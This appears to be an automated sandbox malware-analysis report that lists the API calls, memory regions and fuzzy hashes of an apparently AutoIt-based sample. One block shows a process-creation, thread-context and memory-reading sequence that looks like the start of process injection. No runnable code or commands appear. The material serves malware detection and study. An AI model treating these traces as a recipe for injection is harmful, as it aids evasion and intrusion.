                                                          • Opcode Fuzzy Hash: f3feef706215629c2dc94d3fa7170881c6f675fcbd8b8892affd1358ff9d208a
                                                          • Instruction Fuzzy Hash: 7BF138706083019FCB25DF28C480A6ABBE5FF88318F14892EF9999B751D771E945CF82
                                                          APIs
                                                          • __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036A2EB: __NMSG_WRITE.LIBCMT ref: 0036A312
                                                            • Part of subcall function 0036A2EB: __NMSG_WRITE.LIBCMT ref: 0036A31C
                                                          • __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036A348: GetModuleFileNameW.KERNEL32(00000000,004033BA,00000104,?,00000001,00000000), ref: 0036A3DA
                                                            • Part of subcall function 0036A348: ___crtMessageBoxW.LIBCMT ref: 0036A488
                                                            • Part of subcall function 0036321F: ___crtCorExitProcess.LIBCMT ref: 00363225
                                                            • Part of subcall function 0036321F: ExitProcess.KERNEL32 ref: 0036322E
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                          • String ID:
                                                          • API String ID: 1372826849-0
                                                          • Opcode ID: b52bf4434616439aa66850ce4336bffaac740ba8ca3133f9cce4fa2d75e8f615
                                                          • Instruction ID: 2b7fa49f3078493c7062a67b2b74f634300751cab815375ecde786b5c8195257
                                                          • Opcode Fuzzy Hash: b52bf4434616439aa66850ce4336bffaac740ba8ca3133f9cce4fa2d75e8f615
                                                          • Instruction Fuzzy Hash: 2F01F132380B019BD6133B75EC02A6E779CDF82761F11853AF601EF68ADFB09E004665
                                                          APIs
                                                          • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,003A95F1,?,?,?,?,?,00000004), ref: 003A9964
                                                          • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,003A95F1,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 003A997A
                                                          • CloseHandle.KERNEL32(00000000,?,003A95F1,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 003A9981
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$CloseCreateHandleTime
                                                          • String ID:
                                                          • API String ID: 3397143404-0
                                                          • Opcode ID: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                                          • Instruction ID: 969df93d77d412b7db952ec52da243ccf413715086107706658318eb2d673ce3
                                                          • Opcode Fuzzy Hash: 019bc84b8cadfdf9b893be0f94ed861fd07299f87610093a39b46c5452f91d7d
                                                          • Instruction Fuzzy Hash: D5E08632140214BBDB232B54EC09FDA7B1DEB45760F148225FB54B90E087B129119798
                                                          APIs
                                                          • _free.LIBCMT ref: 003A8DC4
                                                            • Part of subcall function 00362ED5: RtlFreeHeap.NTDLL(00000000,00000000,?,00369BA4), ref: 00362EE9
                                                            • Part of subcall function 00362ED5: GetLastError.KERNEL32(00000000,?,00369BA4), ref: 00362EFB
                                                          • _free.LIBCMT ref: 003A8DD5
                                                          • _free.LIBCMT ref: 003A8DE7
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _free$ErrorFreeHeapLast
                                                          • String ID:
                                                          • API String ID: 776569668-0
                                                          • Opcode ID: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                          • Instruction ID: 1117deaa540571fb48329829a8f6e6feac4276e6b030d060c2e05c1bce8606f8
                                                          • Opcode Fuzzy Hash: 3221efda5ec1aeb3564d3aaca8a62a8878e7642d45a62f0f0d26450024f2f6e1
                                                          • Instruction Fuzzy Hash: BBE05EE1701B0183DA26A77CAD44E9333ECDF99765B160C2EF40ADB5C6CE24F8818138
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: CALL
                                                          • API String ID: 0-4196123274
                                                          • Opcode ID: aa9e47bed732e4153b33c92876f26ebd7585505211de83d26cfd424fea47f41b
                                                          • Instruction ID: 7166ba7c4acf2e601120d7a815ee3a1cc408dbe9d47a436dcd247ca61c3ca931
                                                          • Opcode Fuzzy Hash: aa9e47bed732e4153b33c92876f26ebd7585505211de83d26cfd424fea47f41b
                                                          • Instruction Fuzzy Hash: 94223770508701CFCB2ADF24C491B2ABBE5BF85304F15896DE89A9F662D735EC45CB82
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: e7d2d49602d2794d161de5c513f13cf70984f02b9fc362fedd43b39a6bdced4a
                                                          • Instruction ID: 7c69b6be975f1570c4660c23c11c38454ab09b7986eaed69460b1d9075afc964
                                                          • Opcode Fuzzy Hash: e7d2d49602d2794d161de5c513f13cf70984f02b9fc362fedd43b39a6bdced4a
                                                          • Instruction Fuzzy Hash: 6731B1B1604606AFC715DF28D9D1E6AB3E8FF483207158629E419CF691DB70FC10CB90
                                                          APIs
                                                          • IsThemeActive.UXTHEME ref: 00344992
                                                            • Part of subcall function 003634EC: __lock.LIBCMT ref: 003634F2
                                                            • Part of subcall function 003634EC: DecodePointer.KERNEL32(00000001,?,003449A7,00397F9C), ref: 003634FE
                                                            • Part of subcall function 003634EC: EncodePointer.KERNEL32(?,?,003449A7,00397F9C), ref: 00363509
                                                            • Part of subcall function 00344A5B: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00344A73
                                                            • Part of subcall function 00344A5B: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00344A88
                                                            • Part of subcall function 00343B4C: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00343B7A
                                                            • Part of subcall function 00343B4C: IsDebuggerPresent.KERNEL32 ref: 00343B8C
                                                            • Part of subcall function 00343B4C: GetFullPathNameW.KERNEL32(00007FFF,?,?,004052F8,004052E0,?,?), ref: 00343BFD
                                                            • Part of subcall function 00343B4C: SetCurrentDirectoryW.KERNEL32(?), ref: 00343C81
                                                          • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 003449D2
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                          • String ID:
                                                          • API String ID: 1438897964-0
                                                          • Opcode ID: b9ec9f0f92bbfc27d4cd193746ba9fb747e4cc61afe21011e99d7f0037d4fb5f
                                                          • Instruction ID: 485f3e04b2f8200d4dfdb5ef3e70f9ed200a87f8719134519c3815f3eb527fd7
                                                          • Opcode Fuzzy Hash: b9ec9f0f92bbfc27d4cd193746ba9fb747e4cc61afe21011e99d7f0037d4fb5f
                                                          • Instruction Fuzzy Hash: 87118C718143159FC702DF29D945A0BFFE8EF84710F00852EF045AB2A1DB70A958CF9A
                                                          APIs
                                                            • Part of subcall function 0036588C: __FF_MSGBANNER.LIBCMT ref: 003658A3
                                                            • Part of subcall function 0036588C: __NMSG_WRITE.LIBCMT ref: 003658AA
                                                            • Part of subcall function 0036588C: RtlAllocateHeap.NTDLL(01730000,00000000,00000001,00000000,?,?,?,00360F53,?), ref: 003658CF
                                                          • std::exception::exception.LIBCMT ref: 00360F6C
                                                          • __CxxThrowException@8.LIBCMT ref: 00360F81
                                                            • Part of subcall function 0036871B: RaiseException.KERNEL32(?,?,?,003F9E78,00000000,?,?,?,?,00360F86,?,003F9E78,?,00000001), ref: 00368770
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                          • String ID:
                                                          • API String ID: 3902256705-0
                                                          • Opcode ID: e08cac8acadfddac0950dd7fa055a2a1cddf95d4a5058e84ad8c7378936a549b
                                                          • Instruction ID: e1199f4d02a58ecf5ac446a5e69ee29e646e1e905c7ff534c070aa77f8d6a87d
                                                          • Opcode Fuzzy Hash: e08cac8acadfddac0950dd7fa055a2a1cddf95d4a5058e84ad8c7378936a549b
                                                          • Instruction Fuzzy Hash: 96F02D7550420D66C72BBB94EC029DF7B9CDF10310F108526FD049E286DFB08A50C2D1
                                                          APIs
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          • __lock_file.LIBCMT ref: 0036555B
                                                            • Part of subcall function 00366D8E: __lock.LIBCMT ref: 00366DB1
                                                          • __fclose_nolock.LIBCMT ref: 00365566
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                          • String ID:
                                                          • API String ID: 2800547568-0
                                                          • Opcode ID: a0664185684e78c87cec396f4b3633171a703a6357a5d873e131d139a652a7bb
                                                          • Instruction ID: 5496560ef1e20976e17d72e382451838602a40c961a9550fce6c2c9970464e1d
                                                          • Opcode Fuzzy Hash: a0664185684e78c87cec396f4b3633171a703a6357a5d873e131d139a652a7bb
                                                          • Instruction Fuzzy Hash: A4F0B471901B059BD713AF7A880ABAE67A26F42331F15C319F517AF1C9CF7C49019B62
                                                          APIs
                                                          • CreateProcessW.KERNELBASE(?,00000000), ref: 024E1A5B
                                                          • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 024E1AF1
                                                          • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 024E1B13
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                          • String ID:
                                                          • API String ID: 2438371351-0
                                                          • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction ID: ca8fa49619fd81047e1b529a0fe54354d755c2b5c96c7a2c55e3e6795a101f3b
                                                          • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                          • Instruction Fuzzy Hash: 5712CD24E24658C6EB24DF64D8507DEB232EF68301F1090E9910DEB7A5E77A4F81CF5A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: 3939b7a52f8be546297366841c58e8db066dd1d967b391fb82647a7e5341f5b0
                                                          • Instruction ID: 1e3361b225a702f541129caaf6aa5b6d85e80db8e6b425395224b63136c0e59b
                                                          • Opcode Fuzzy Hash: 3939b7a52f8be546297366841c58e8db066dd1d967b391fb82647a7e5341f5b0
                                                          • Instruction Fuzzy Hash: 494125745087418FDB26DF14C494B1ABBE0BF45318F0A88ACE8999F762C732F849CB42
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: f790de36aa46022a2a0980986bfcace91817953cbf8ef9931aae8720dfcafdf4
                                                          • Instruction ID: b9e0de1cf6a06c5864ed07d26527fe766de711e7b68ae577887031941cd99b18
                                                          • Opcode Fuzzy Hash: f790de36aa46022a2a0980986bfcace91817953cbf8ef9931aae8720dfcafdf4
                                                          • Instruction Fuzzy Hash: 5521F172614A09EBDB268F25EC81B7A7BF8FF14350F22C46EE44AC9591EB3094D0D754
                                                          APIs
                                                            • Part of subcall function 00344D13: FreeLibrary.KERNEL32(00000000,?), ref: 00344D4D
                                                            • Part of subcall function 003653CB: __wfsopen.LIBCMT ref: 003653D6
                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344F6F
                                                            • Part of subcall function 00344CC8: FreeLibrary.KERNEL32(00000000), ref: 00344D02
                                                            • Part of subcall function 00344DD0: _memmove.LIBCMT ref: 00344E1A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Library$Free$Load__wfsopen_memmove
                                                          • String ID:
                                                          • API String ID: 1396898556-0
                                                          • Opcode ID: 941734f40d3759cf2b6a83513357526fa2b77798e73f05228f89debe02ece9c3
                                                          • Instruction ID: 63506e69269f28a37b158d7adde399d2aec3c753797fe0e0cfc1dcbeed921119
                                                          • Opcode Fuzzy Hash: 941734f40d3759cf2b6a83513357526fa2b77798e73f05228f89debe02ece9c3
                                                          • Instruction Fuzzy Hash: B811E731B00606ABDF23AF70CC52FAE77E9DF44B00F108839F541AE182DA75AE059750
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ClearVariant
                                                          • String ID:
                                                          • API String ID: 1473721057-0
                                                          • Opcode ID: a69c211564c5b5b34c93734965d43cde4af549a9834768fe0491c75a5ec22d95
                                                          • Instruction ID: bf384a05ec3f8faf08b27af7ab37fdc3d9ccc8cd0fd63436247d7571215884c6
                                                          • Opcode Fuzzy Hash: a69c211564c5b5b34c93734965d43cde4af549a9834768fe0491c75a5ec22d95
                                                          • Instruction Fuzzy Hash: 11212274508301CFCB2ADF14C444A1BBBE5BF88314F0589A8E8965B721C731F849CB92
                                                          APIs
                                                          • __lock_file.LIBCMT ref: 00364A16
                                                            • Part of subcall function 00368CA8: __getptd_noexit.LIBCMT ref: 00368CA8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __getptd_noexit__lock_file
                                                          • String ID:
                                                          • API String ID: 2597487223-0
                                                          • Opcode ID: 40d2c16ea6ea7e8d88ce9209e61bc2706b4593312607ec3e19e00a92b49517a6
                                                          • Instruction ID: 99bb8382a52fd5ab18c4176c2686254a820c11587bf31333e474f4965faca096
                                                          • Opcode Fuzzy Hash: 40d2c16ea6ea7e8d88ce9209e61bc2706b4593312607ec3e19e00a92b49517a6
                                                          • Instruction Fuzzy Hash: E9F0AF31D40245ABDF13AFA4CC067EE76A1AF00325F05C618F824AF199DBB88910DF55
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,?,004052F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00344FDE
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FreeLibrary
                                                          • String ID:
                                                          • API String ID: 3664257935-0
                                                          • Opcode ID: 6b0536c028131fb64638057a333ff9fc5fdc85e7a005ce21e358b5ad745ce4aa
                                                          • Instruction ID: 1504ba7b24834bcb6dd8ee95454baecc7351b01c72610406dbbb338b0cbb4420
                                                          • Opcode Fuzzy Hash: 6b0536c028131fb64638057a333ff9fc5fdc85e7a005ce21e358b5ad745ce4aa
                                                          • Instruction Fuzzy Hash: 0DF039B1105712CFCB369F64E494912BBE5BF043293258A3EE5D78AA10C731B848DF40
                                                          APIs
                                                          • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00360930
                                                            • Part of subcall function 00347D2C: _memmove.LIBCMT ref: 00347D66
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: LongNamePath_memmove
                                                          • String ID:
                                                          • API String ID: 2514874351-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __wfsopen
                                                          • String ID:
                                                          • API String ID: 197181222-0
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AllocVirtual
                                                          • String ID:
                                                          • API String ID: 4275171209-0
                                                          APIs
                                                          • Sleep.KERNELBASE(000001F4), ref: 024E22B1
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304979250.00000000024E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024E0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_24e0000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Sleep
                                                          • String ID:
                                                          • API String ID: 3472027048-0
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 003CCBA1
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCBFF
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CCC40
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCC6A
                                                          • SendMessageW.USER32 ref: 003CCC93
                                                          • _wcsncpy.LIBCMT ref: 003CCCFF
                                                          • GetKeyState.USER32(00000011), ref: 003CCD20
                                                          • GetKeyState.USER32(00000009), ref: 003CCD2D
                                                          • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 003CCD43
                                                          • GetKeyState.USER32(00000010), ref: 003CCD4D
                                                          • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003CCD76
                                                          • SendMessageW.USER32 ref: 003CCD9D
                                                          • SendMessageW.USER32(?,00001030,?,003CB37C), ref: 003CCEA1
                                                          • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 003CCEB7
                                                          • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 003CCECA
                                                          • SetCapture.USER32(?), ref: 003CCED3
                                                          • ClientToScreen.USER32(?,?), ref: 003CCF38
                                                          • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 003CCF45
                                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 003CCF5F
                                                          • ReleaseCapture.USER32 ref: 003CCF6A
                                                          • GetCursorPos.USER32(?), ref: 003CCFA4
                                                          • ScreenToClient.USER32(?,?), ref: 003CCFB1
                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD00D
                                                          • SendMessageW.USER32 ref: 003CD03B
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD078
                                                          • SendMessageW.USER32 ref: 003CD0A7
                                                          • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 003CD0C8
                                                          • SendMessageW.USER32(?,0000110B,00000009,?), ref: 003CD0D7
                                                          • GetCursorPos.USER32(?), ref: 003CD0F7
                                                          • ScreenToClient.USER32(?,?), ref: 003CD104
                                                          • GetParent.USER32(?), ref: 003CD124
